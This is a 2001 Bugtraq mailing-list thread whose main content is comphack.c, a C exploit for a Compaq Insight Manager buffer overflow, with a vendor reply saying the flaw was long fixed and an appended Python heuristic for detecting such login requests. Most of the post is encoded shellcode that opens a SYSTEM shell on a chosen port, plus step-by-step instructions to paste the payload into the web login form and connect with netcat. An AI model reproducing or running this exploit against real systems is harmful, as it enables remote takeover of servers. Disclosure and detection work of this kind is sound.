re: comphack - Compaq Insight Manager Remote SYSTEM shell


This has been fixed for at least 18 months.  We suggest that you
get the current release of the agent software and Compaq Insight
Manager. Version 5.2 or 5.1; it's on the web....
http://www.compaq.com/products/servers/management/
and so are the old advisories...
www.compaq.com/products/servers/management/system-advisories.html

regards,
Rich


-----Original Message-----
From: Indigo [mailto:indig0@talk21.com]
Sent: Thursday, November 29, 2001 4:55 AM
To: bugtraq@securityfocus.com
Subject: comphack - Compaq Insight Manager Remote SYSTEM shell


Mailer: SecurityFocus

I'm running out of Win32 vulnerabilities to exploit here...Anyone got any ideas?



Cheers,

Indigo.







/*	comphack.c - Compaq Insight Manager overflow exploit by Indigo <indig0@talk21.com> 2001

	Usage: comphack <victim port>

	This code has been compiled and tested on Linux and Win32

	The shellcode spawns a SYSTEM shell on the chosen port

	Main shellcode adapted from code written by izan@deepzone.org

	Greets to:

	Morphsta, Br00t, Macavity, Jacob & Monkfish...Not forgetting D-Niderlunds
*/

/* #include <windows.h> uncomment if compiling on Win32 (winsock supplies htons) */
#include <stdio.h>
#include <stdlib.h>	/* atoi, exit */
#ifndef _WIN32
#include <arpa/inet.h>	/* htons */
#endif

int main(int argc, char **argv)
{
	/* 456 bytes of 'a' (0x61) padding, then the payload.  The listening
	   port is patched in at offsets 1650-1651, XORed with 0x5f5f (see below). */
	unsigned char shellcode[] =
	"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61"
	"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61"
	"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61"
	"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61"
	"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61"
	"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61"
	"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61"
	"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61"
	"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61"
	"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61"
	"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61"
	"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61"
	"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61"
	"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61"
	"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61"
	"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61"
	"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61"
	"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61"
	"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61"
	"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61"
	"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61"
	"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61"
	"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61"
	"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61"
	"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61"
	"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61"
	"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61"
	"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61"
	"\x61\x61\x61\x61\x61\x61\x61\x61\x2B\x16\xEA\x77\xFF\xE1\x03\x10"
	"\xEA\x2F\x05\x10\x90\x90\x90\x90\x31\xFF\x01\xE7\x31\xC9\xB1\x6F"
	"\x01\xCF\xB1\x4C\x01\xCF\x31\xC0\xB0\x20\x29\x07\x31\xDB\xB3\x18"
	"\x01\xDF\x29\x07\xB3\x20\x01\xDF\x29\x07\xB3\x1D\x01\xDF\x29\x07"
	"\xB3\x19\x01\xDF\x29\x07\xB3\x55\x01\xDF\x29\x07\xB3\x05\x01\xDF"
	"\xB3\x05\x01\xDF\x29\x07\xB3\x4B\x01\xDF\x29\x07\xB3\x12\x01\xDF"
	"\x29\x07\xB3\x17\x01\xDF\x29\x07\xB3\x07\x01\xDF\x29\x07\xB3\x14"
	"\x01\xDF\x29\x07\xB3\x28\x01\xDF\x29\x07\xB3\x3F\x01\xDF\x29\x07"
	"\xB3\x7C\x01\xDF\x29\x07\xB3\xCE\x01\xDF\x29\x07\xB3\x08\x01\xDF"
	"\x29\x07\xB3\x3B\x01\xDF\x29\x07\xB3\x4B\x01\xDF\x29\x07\x66\x81"
	"\xEF\xA3\x03\x31\xDB\xB8\x5F\x5F\x5F\x5F\x31\x07\x47\x47\x47\x47"
	"\x43\x43\x43\x43\x66\x81\xFB\xFC\x04\x7E\xEF\xB7\x5F\x5F\x5F\x5F"
	"\x02\xDE\xB2\xA6\x7E\x1F\x5F\xD2\xEA\xAD\x7B\x1F\x5F\xD2\xE2\xA5"
	"\x7B\x1F\x5F\x35\x58\xCF\xCF\xCF\xCF\x06\xB7\xAD\x5D\x5F\x5F\xD2"
	"\xEA\x75\x7A\x1F\x5F\xD2\xE2\x6C\x7A\x1F\x5F\x35\x55\xCF\xCF\xCF"
	"\xCF\x06\xB7\xE5\x5D\x5F\x5F\x35\x5F\xD2\xEA\xA6\x7A\x1F\x5F\x09"
	"\xD2\xEA\xBA\x7A\x1F\x5F\x09\xD2\xEA\xB6\x7A\x1F\x5F\x09\xA0\xCA"
	"\x6C\x7A\x1F\x5F\x35\x5F\xD2\xEA\xA6\x7A\x1F\x5F\x09\xD2\xEA\xB2"
	"\x7A\x1F\x5F\x09\xD2\xEA\xAE\x7A\x1F\x5F\x09\xA0\xCA\x6C\x7A\x1F"
	"\x5F\xB8\xDA\xAA\x7A\x1F\x5F\x1B\x5F\x5F\x5F\xD2\xEA\xAA\x7A\x1F"
	"\x5F\x09\xA0\xCA\x68\x7A\x1F\x5F\xD2\xEA\x72\x79\x1F\x5F\xF2\x0F"
	"\xA0\xCA\x0C\x7A\x1F\x5F\xD2\xEA\x6E\x79\x1F\x5F\xF2\x0F\xA0\xCA"
	"\x0C\x7A\x1F\x5F\xD2\xEA\xAE\x7A\x1F\x5F\xD2\xE2\x72\x79\x1F\x5F"
	"\xFA\xD2\xEA\xBA\x7A\x1F\x5F\xF2\xD2\xE2\x6E\x79\x1F\x5F\xF4\xD2"
	"\xE2\x6A\x79\x1F\x5F\xF4\xB8\xDA\x7A\x79\x1F\x5F\x5F\x5F\x5F\x5F"
	"\xB8\xDA\x7E\x79\x1F\x5F\x5E\x5E\x5F\x5F\xD2\xEA\x66\x79\x1F\x5F"
	"\x09\xD2\xEA\xAA\x7A\x1F\x5F\x09\x35\x5F\x35\x5F\x35\x4F\x35\x5E"
	"\x35\x5F\x35\x5F\xD2\xEA\x16\x79\x1F\x5F\x09\x35\x5F\xA0\xCA\x64"
	"\x7A\x1F\x5F\x37\x5F\x7F\x5F\x5F\xCF\x37\x5F\x5D\x5F\x5F\xA0\xCA"
	"\x1C\x7A\x1F\x5F\xD6\xDA\x0E\x79\x1F\x5F\x6C\xBF\x0F\x1F\x0F\x1F"
	"\x0F\xA0\xCA\xA5\x7B\x1F\x5F\x0F\x04\x35\x4F\xD2\xEA\xB6\x7A\x1F"
	"\x5F\x09\x0C\xA0\xCA\xA1\x7B\x1F\x5F\x35\x5C\x0C\xA0\xCA\x5D\x7A"
	"\x1F\x5F\xD2\xEA\x2A\x79\x1F\x5F\x09\xD2\xEA\xB6\x7A\x1F\x5F\x09"
	"\x0C\xA0\xCA\x59\x7A\x1F\x5F\xD2\xE2\x06\x79\x1F\x5F\xF4\x6C\xBF"
	"\x0F\xD2\xE2\x3A\x79\x1F\x5F\x08\x0F\x0F\x0F\xD2\xEA\xB6\x7A\x1F"
	"\x5F\xF2\x0F\xA0\xCA\x60\x7A\x1F\x5F\x35\x6F\xA0\xCA\x10\x7A\x1F"
	"\x5F\xB4\x12\xCF\xCF\xCF\x6C\xBF\x0F\xD2\xE2\x3A\x79\x1F\x5F\x08"
	"\x0F\x0F\x0F\xD2\xEA\xB6\x7A\x1F\x5F\xF2\x0F\xA0\xCA\x60\x7A\x1F"
	"\x5F\x35\x6F\xA0\xCA\x10\x7A\x1F\x5F\xDC\xE2\x3A\x79\x1F\x5F\x5D"
	"\x50\xDD\x48\x5E\x5F\x5F\xDE\xE2\x3A\x79\x1F\x5F\x5E\x7F\x5F\x5F"
	"\x2D\x51\xCF\xCF\xCF\xCF\xB8\xDA\x3A\x79\x1F\x5F\x5F\x7F\x5F\x5F"
	"\x35\x5F\xD4\xDA\x3A\x79\x1F\x5F\xD2\xE2\x3A\x79\x1F\x5F\x08\x0F"
	"\xD4\xDA\x0E\x79\x1F\x5F\x0F\xD2\xEA\xB6\x7A\x1F\x5F\xF2\x0F\xA0"
	"\xCA\x18\x7A\x1F\x5F\x35\x6F\xA0\xCA\x10\x7A\x1F\x5F\xD4\xDA\x3A"
	"\x79\x1F\x5F\x35\x5F\x0F\xD2\xEA\x0E\x79\x1F\x5F\xF2\x0F\xD2\xEA"
	"\x06\x79\x1F\x5F\xF2\x0F\xA0\xCA\x55\x7A\x1F\x5F\x35\x5F\xD2\xE2"
	"\x3A\x79\x1F\x5F\x08\x35\x5F\x35\x5F\x35\x5F\xD2\xEA\xB6\x7A\x1F"
	"\x5F\xF2\x0F\xA0\xCA\x60\x7A\x1F\x5F\x35\x6F\xA0\xCA\x10\x7A\x1F"
	"\x5F\x6C\xB6\x66\xD2\x3A\x79\x1F\x5F\x50\xD8\x38\xA0\xA0\xA0\x35"
	"\x5F\x37\x5F\x7F\x5F\x5F\xCF\xD2\xEA\x0E\x79\x1F\x5F\xF2\x0F\xD2"
	"\xEA\x06\x79\x1F\x5F\xF2\x0F\xA0\xCA\x51\x7A\x1F\x5F\xD6\xDA\x3E"
	"\x79\x1F\x5F\x35\x5F\xD2\xE2\x3A\x79\x1F\x5F\x08\x0F\xD2\xEA\x0E"
	"\x79\x1F\x5F\xF2\x0F\xD2\xEA\xB2\x7A\x1F\x5F\xF2\x0F\xA0\xCA\x14"
	"\x7A\x1F\x5F\x35\x6F\xA0\xCA\x10\x7A\x1F\x5F\x35\x5F\xD4\xDA\x3E"
	"\x79\x1F\x5F\xD2\xE2\x3A\x79\x1F\x5F\x08\x0F\xD4\xDA\x0E\x79\x1F"
	"\x5F\x0F\xD2\xEA\xB6\x7A\x1F\x5F\xF2\x0F\xA0\xCA\x18\x7A\x1F\x5F"
	"\x35\x6F\xA0\xCA\x10\x7A\x1F\x5F\xB6\xE6\xA1\xA0\xA0\xD2\xEA\x06"
	"\x79\x1F\x5F\xF2\x0F\xA0\xCA\x4D\x7A\x1F\x5F\xD2\xEA\x02\x79\x1F"
	"\x5F\xF2\x0F\xA0\xCA\x4D\x7A\x1F\x5F\x35\x5F\xA0\xCA\x08\x7A\x1F"
	"\x5F\x0E\x09\x37\x0F\x6D\x5A\x4F\xCF\x05\xA0\x4D\x0F\x04\x06\x08"
	"\x01\x0E\x09\x0C\x37\x07\x6D\x5A\x4F\xCF\x05\xA0\x4D\x0F\xF3\xDB"
	"\xBF\x2A\xA4\x07\xF4\x06\xBD\xB6\xBC\x08\x0C\x10\x1C\x14\x6C\x6D"
	"\x5F\x2C\x30\x3C\x34\x3A\x2B\x5F\x3D\x36\x31\x3B\x5F\x33\x36\x2C"
	"\x2B\x3A\x31\x5F\x3E\x3C\x3C\x3A\x2F\x2B\x5F\x2C\x3A\x31\x3B\x5F"
	"\x2D\x3A\x3C\x29\x5F\x3C\x33\x30\x2C\x3A\x2C\x30\x3C\x34\x3A\x2B"
	"\x5F\x14\x1A\x2D\x11\x1A\x13\x6C\x6D\x5F\x1C\x2D\x3A\x3E\x2B\x3A"
	"\x0F\x36\x2F\x3A\x5F\x18\x3A\x2B\x0C\x2B\x3E\x2D\x2B\x2A\x2F\x16"
	"\x31\x39\x30\x1E\x5F\x1C\x2D\x3A\x3E\x2B\x3A\x0F\x2D\x30\x3C\x3A"
	"\x2C\x2C\x1E\x5F\x0F\x3A\x3A\x34\x11\x3E\x32\x3A\x3B\x0F\x36\x2F"
	"\x3A\x5F\x18\x33\x30\x3D\x3E\x33\x1E\x33\x33\x30\x3C\x5F\x2D\x3A"
	"\x3E\x3B\x19\x36\x33\x3A\x5F\x08\x2D\x36\x2B\x3A\x19\x36\x33\x3A"
	"\x5F\x0C\x33\x3A\x3A\x2F\x5F\x1C\x33\x30\x2C\x3A\x17\x3E\x31\x3B"
	"\x33\x3A\x5F\x1A\x27\x36\x2B\x0F\x2D\x30\x3C\x3A\x2C\x2C\x5F\x1C"
	"\x30\x3B\x3A\x3B\x7F\x3D\x26\x7F\x23\x05\x3E\x31\x7F\x63\x36\x25"
	"\x3E\x31\x1F\x3B\x3A\x3A\x2F\x25\x30\x31\x3A\x71\x30\x2D\x38\x61"
	"\x5D\x5F\x40\x17\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F"
	"\x53\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5E\x5F\x5F\x5F\x5F\x5F\x5F\x5F"
	"\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F"
	"\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F"
	"\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F"
	"\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F"
	"\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F"
	"\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F"
	"\x1C\x12\x1B\x71\x1A\x07\x1A\x5F\x5F\x5F\x5F\x5F\x4F\x5F\x5F\x5F"
	"\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F"
	"\x56\x56\x56\x56\x56\x00";

	FILE *fp;
	unsigned short int a_port;

	printf ("\nCompaq Insight Manager overflow launcher\nby Indigo <indig0@talk21.com> 2001\n\n");
	printf ("This program will generate a binary file called exploit.bin\n");
	printf ("Connect to the victim using a web browser http://victim:2301\n");
	printf ("Next to \'Login Account\', click on \'anonymous\'\n");
	printf ("Enter some random characters into the \'password\' field\n");
	printf ("Open exploit.bin in notepad, highlight it then copy to the clipboard\n");
	printf ("Paste the exploit into the \'Name\' field and click OK\n");
	printf ("\nLaunch netcat: nc <victim host> <victim port>\n");
	printf ("\nThe exploit spawns a SYSTEM shell on the chosen port\n\n");

	if (argc != 2)
	{
		printf ("Usage: %s <victim port>\n", argv[0]);
		exit (0);
	}

	/* port in network byte order, XORed with 0x5f5f to match the payload's encoding */
	a_port = htons(atoi(argv[1]));
	a_port ^= 0x5f5f;

	shellcode[1650] = (a_port) & 0xff;
	shellcode[1651] = (a_port >> 8) & 0xff;

	fp = fopen ("./exploit.bin","wb");
	if (fp == NULL)
	{
		perror ("fopen");
		return 1;
	}

	/* the payload holds no NUL before its terminator, so fputs writes all of it */
	fputs ((const char *)shellcode, fp);
	fclose (fp);

	return 0;
}
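A detection-side counterpart to the post, as an added example (not Indigo's or Compaq's code): it inspects a login request to the agent's web port 2301 for the traits the payload above has, an oversize Name field, a long run of one padding byte, and binary bytes in a text field. The request layout, the form field names and the thresholds are assumptions.

```python
from urllib.parse import unquote_to_bytes
import re

CIM_PORT = 2301          # the agent's web port named in the post (http://victim:2301)
PAD_BYTE = 0x61          # the exploit front-loads the Name field with 'a' bytes
MIN_PAD_RUN = 64         # assumed: no real login name repeats one byte this often
MAX_FIELD_LEN = 256      # assumed upper bound for a login form field


def parse_form_body(body: bytes) -> dict:
    """Decode an application/x-www-form-urlencoded body to {field: [raw bytes]}."""
    fields = {}
    for pair in body.split(b"&"):
        if not pair:
            continue
        key, _, value = pair.partition(b"=")
        name = unquote_to_bytes(key.replace(b"+", b" ")).decode("latin-1")
        fields.setdefault(name, []).append(unquote_to_bytes(value.replace(b"+", b" ")))
    return fields


def field_findings(name: str, value: bytes) -> list:
    """Heuristics drawn from the payload layout: size, padding run, control bytes."""
    findings = []
    if len(value) > MAX_FIELD_LEN:
        findings.append(f"{name}: oversize field ({len(value)} bytes)")
    run = re.search(rb"(.)\1{%d,}" % (MIN_PAD_RUN - 1), value, re.S)
    if run:
        findings.append(f"{name}: {len(run.group(0))}-byte run of 0x{run.group(1)[0]:02x}")
    ctrl = sum(1 for b in value if b < 0x20 and b not in (0x09, 0x0A, 0x0D))
    if ctrl:
        findings.append(f"{name}: {ctrl} control bytes in a text field")
    return findings


def inspect_login(dst_port: int, body: bytes) -> list:
    """Return findings for one captured request; only the agent port is in scope."""
    if dst_port != CIM_PORT:
        return []
    findings = []
    for name, values in parse_form_body(body).items():
        for value in values:
            findings.extend(field_findings(name, value))
    return findings


# Constructed samples (field names are assumed, not taken from the agent):
BENIGN = b"account=anonymous&password=x&name=J.+Smith"
SUSPECT = (b"account=anonymous&password=zzz&name="
           + b"a" * 456                          # the exploit's 0x61 padding length
           + b"%01%02%03%04%05%06%07%08%10")     # constructed percent-encoded binary
```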

